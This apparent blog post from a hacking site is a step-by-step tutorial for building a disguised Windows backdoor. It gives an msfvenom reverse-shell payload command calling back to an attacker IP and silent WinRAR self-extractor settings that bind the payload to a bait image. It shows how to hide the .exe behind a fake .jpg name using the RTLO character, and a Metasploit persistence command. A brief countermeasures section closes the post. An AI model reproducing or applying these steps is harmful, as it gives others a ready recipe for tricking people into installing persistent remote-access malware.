Create a persistent backdoor by masking it with the RTLO character

Hello everybody!!

After a few weeks of disconnection (and especially with back and neck pains), I took a little time to show you a little peculiar thing that once caught my attention.

You will always have heard that it is not advisable or that you do not download and even run files from unreliable or untrustworthy places (which we all do, right? 😆). I was like that before; – “bah, I’m careful, I know where I’m downloading”; – “If it is a pdf or an image or something like that, nothing happens, as long as it is not an .exe or a strange format, nothing happens … right ?“.

Well, the thing rather, is a little different. This post is not really focused on how to do a backdoor, but rather, how it can strain us, and well strain, if we do not have a minimum of care when, for example, visualize a image.

From the point of view of the attacker, the steps that could be done, as well as the tools and environments used, will be described throughout the post.

Using msfvenom that collects all the uses and tools of the Msfpayload and Msfencode since June 2015, in the same framework, the payload can be created. The command to be used will be, for example:

 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.36 LPORT=4444 --platform windows --arch x86 -f exe > reverse_tcp.exe

But first, it is necessary to know what we are doing. Taking a look at the msfvenom help, you can see what each input parameter that accompanies the command call means.

Msfvenom' help.

Therefore, our command indicates that the payload to be generated will be of type meterpreter using reverse connection via TCP under the windows operating system. The payloads of meterpreter have the peculiarity that it uses DLL injection in memory and that is why they sometimes become difficult to detect. I have opted for this payload because it is typical.

In addition, it indicates the local IP, that is, the IP of our machine, that for this environment controlled using virtual machines, the IP of my machine (attacker) is 192.168.1.36 (using ifconfig you can look at the IP), remembering that this IP is only available in internal or private networks (from the router inwards). On the other hand, it is also indicated the port through which the TCP communication will be opened (for example, 4444).

In the same way, the platform is indicated, that is, windows and the x86 architecture, although they are optional parameters.

Finally, the output format, in this case is executable type (exe).

All this is redirected to a specific path, you can also use it -o as it says in the help to save the payload in the path + name.format specified.

I could continue explaining some more things about msfvenom, as well as about meterpreter (since there is a lot of work and study behind). For example, to know what types of payloads there are, as well as, encoders, architecture, platform, etc., you can use –list <type> to list all the possible ones, payloads, encoders, architecture, platform, etc; To not lengthen too much, I’ll go a little to the point. Someday I will talk more about the topic in a post.

Finally we would have the payload reverse_tcp created.

Reverse tcp payload created.

The victim would execute this payload, but the victim does not know that, that is, we could associate it with an image (for example), so that when the image opens, it executes the payload without the victim being aware.

This point can be made in different ways; I will use one of the basic forms (and a bit old), and is “binding” the image to the payload by means of a SFX, that is, a self-extractible that can be generated with Winrar. But it can also be generated with other tools, for example, with AutoIt, although here it would not be necessary to do the payload with msfvenom; directly with a script, this tool would be able to compile a script au3 indicating the associated image and the payload. For convenience I will use Winrar.

Now we just need to look for an image that is attractive to the victim. I have searched for one, but it could be any other.

Ford Mustang GT.

With the chosen image, it should be converted into an icon using the ICO Convert online converter. At this point, we have the icon, the original image and the payload so we can now go to the point of using Winrar to create the SFX.

Selecting the original image and the payload, we launch Winrar to add both to the new SFX file. To do this you have to select Create SFX file and write an appropriate name, for example FordMustang.exe (it can be changed later).

Add to SFX.

Now that we are going to create an SFX, new options are enabled in the Advanced tab> SFX Options. A new window will open where we will begin to configure in the Configuration tab> Run after the extraction and we will add the two files (image and payload) that we want to be executed after the extraction.

Advanced setup tab of SFX.

We continue with the Modes tab where we select that the extraction is done in a temporary folder, and activate the silent mode in hide everything.

Advanced mode tab SFX.

We go to the Text and icon tab and indicate that it loads the icon that was previously created.

Text and Icon tab of SFX.

Finally, in the Update tab we assign the Update Mode to “Extract and replace files” and in Overwrite Mode to “Overwrite all files“.

Update tab of SFX.

Everything would be ready, we accept and we will have ready the SFX.

Final result.

Now you will say, “but, if it’s an exe!“, Yes, but now the RTLO (Right To Left Override) character comes into play. This character is a Unicode character (U+202e) that is used to read Arabic, Hebrew text, etc. But in certain cases it can do a lot of damage, and this is one of them.

To use this character, you can use the typical character map, in Linux for example “Character Map” and in Windows, likewise “Character Map“. As we are now in Windows I show you an image.

Character map RTLO.

Since the function of the character is to make everything on its right flip its letters, it will be placed in a specific place. In our case, we have: FordMustang.exe and we want to convert it so that it has a .jpg ending. For it to happen we must place the letters JPG in reverse, that is, GPJ so that when the flip is done, there is JPG. Placing the RTLO character before the letter G. Look how it looks!

Effect of RTLO character

I stayed that way when I discovered it 🤤. And of course you can say, okay, there is the exe name in front, but remember that not only with an .exe can execute code, you can use: .bat, .cmd, .com, .ink, .pif, .scr, .vb, .vbe, .vbs, .wsh. In addition, it is likely that using a little imagination, use of words and who knows if any other character in combination with RTLO it is possible to change the text in such a way that it is difficult to distinguish this type of masking.

Final, and unfortunately, the payload is hidden by an SFX and in turn masked by the RTLO character. If this comes to the victim and he executes it, he will see the photo of the Mustang GT that has been chosen as bait, but he has already executed the payload. The result is:

Final result with RTLO

Returning to the machine of the attacker, who will be waiting for the victim to “visualize” the Mustang GT that is going to sell him, will be with Metasploit waiting for the TCP communication to be opened by the victim.

Msfconsole launched. Metasploit.

As the attacker knows the type of payload that he has created, he will have configured Metasploit in the same way, so that he can communicate correctly, that is, he will have selected the appropriate handler responsible for TCP communication and the rest of the parameters which the payload was created.

Metasploit ready and listening Metasploit.

Once the victim has “visualized” the image, the attacker receives a response from the victim and opens the TCP communication.

Victim launch a malware.

Once the reverse connection is open, we can know system information with sysinfo.

System info of victim PC.

At this point, we are going to make the backdoor persistent, since otherwise, if the victim turns off the PC, the connection will be lost as long as it does not “visualize” the image again. To avoid this, we should use a Ruby script called “persistence” written by Carlos Perez. Showing the help:

Persistent help.

So seeing this, our command will be:

 run persistence -U -i 5 -p 4444 -r 192.168.1.36

That is, every time the victim starts the session, the backdoor will try to open the connection every 5 seconds to the address 192.168.1.36:4444. The interval to choose will depend on what the attacker wants, if you want it to be a bit more stealthy, maybe with 5 min it is fine, if the interval is small, it is more likely to be detected.

Persistent script launched.

If the machine now restarts, the attacker will lose the connection, but the attacker will re-launch the command in Metasploit, “exploit” that will reopen the listening port, so that when the victim logs in again, the connection is reopened .

Unfortunately with all this, the attacker has managed to deceive the victim and install a backdoor that will always be active and waiting for it to receive response from the attacker to open a reverse connection.

COUNTERMEASURES

Seeing this and knowing how far it can get (I think anyone would give a little insecurity), there are some countermeasures to detect this by the victim to prevent it (at least as far as I know). That is, knowing that what he are about to visualize, open or execute, is legitimate or not.

On the one hand, the RTLO character works in certain circumstances, the example I have shown is in any folder (except in a network folder that would give a warning when trying to execute an exe even we, as a victim, don’t know it). On the other hand, if that file you have received, you place it on the desktop, the RTLO character doesn’t work. Also, if we look at details, it will tell us what its type is application and if we see its properties it will tell us that it is an .exe

Possible malwared detection.

If at any time you have doubts, whether you have bundled it or not, you can always look at which are the active communications on the machine and what is your associated PID and close the process with a taskkill -PID <processID> / F, this is with netstat -o -a. Also in the task manager you could see processes with a strange name. If the persistent payload is launched but has not connected to the attacker, in the task manager, you can see how a process with a strange name appears, launching and closing (this is due to the interval when creating the persistence). Once the connection has been established, it will remain constant.

Intermittent and fixed process.

To avoid this, if we go to system configuration (MSCONFIG), we can detect that there is something strange configured to be launched at the starting of the system. And that also has a launch route TEMP.

Weird configuration in MSCONFIG.

If we notice this, the best is to delete this start entry and therefore delete the TEMP of our machine.

As you can see, there are several ways to detect that something strange is happening. I have to say, surely not all backdoors work in the same way, but with the “guidelines” that I have commented, some information can be extracted. As always as a recommendation, is to have an antivirus, have the UAC (User Account Control) activated to the maximum, and have all the software updated, especially Windows, and remember that the last word, you have it.

Unfortunately, most people who use a computer don’t have at least a medium level of knowledge, so that if they are in such a situation, they can avoid it. Due to these situations, it is always good to share the knowledge one has learned and try to fight it.

Regarding the creation of the backdoor and the rest of the posts of Allhacked, IN ANY MOMMENT AND OF COURSE my person is NOT responsible for any misuse as it says in the Allhacked’s policies. Evil is out there, but not here; This post is focused on teaching the bad (to know how it works) and how it could be fought.

PS: Forgive so many images, but I wanted to be clear. I also remind you that the Allhacked including its posts (including this one), are also available in Spanish.

I hope I have explained myself clearly and I hope you liked it. See you in the next post! 😉

Happy Hacking!



Leave a Reply

Your email address will not be published. Required fields are marked *